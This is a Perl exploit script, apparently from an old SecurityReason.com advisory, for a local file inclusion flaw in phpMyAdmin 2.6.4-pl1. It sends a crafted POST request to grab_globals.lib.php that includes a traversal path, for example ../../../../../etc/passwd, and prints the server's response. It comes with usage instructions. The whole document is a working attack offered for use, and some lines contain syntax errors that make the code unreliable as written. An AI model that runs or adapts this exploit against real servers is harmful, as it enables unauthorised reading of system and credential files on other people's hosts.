#!/usr/bin/perl
use IO::Socket;

# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreason.com
#
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# SecurityReason.com

if (@ARGV < 3)
{
print " SecurityReason TEAM ";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1 ";
print " ";
print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE ";
print "HOST - Host where is phpmyadmin example: http://localhost ";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/ ";
print "FILE - file to inclusion ../../../../../etc/passwd ";
print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd ";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][c
XIb8O3]=1";
$LENGTH = length $FILE;

print " ATTACK HOST IS: ".$HOST." ";
$HOST =~ s/(http://)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80"
) || die "Error 404 ";

print $get1 "POST ".$DIR." HTTP/1.0 ";
print $get1 "Host: ".%HOST." ";
print $get1 "Content-Type: application/x-www-form-urlencoded ";
print $get1 "Content-Length: ".$LENGTH." ";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /Warning: main(): Unable to access ./$ARGV[2] in / ) {
printf " File ".$ARGV[2]." no exists. ";
exit;
}

printf $odp;
}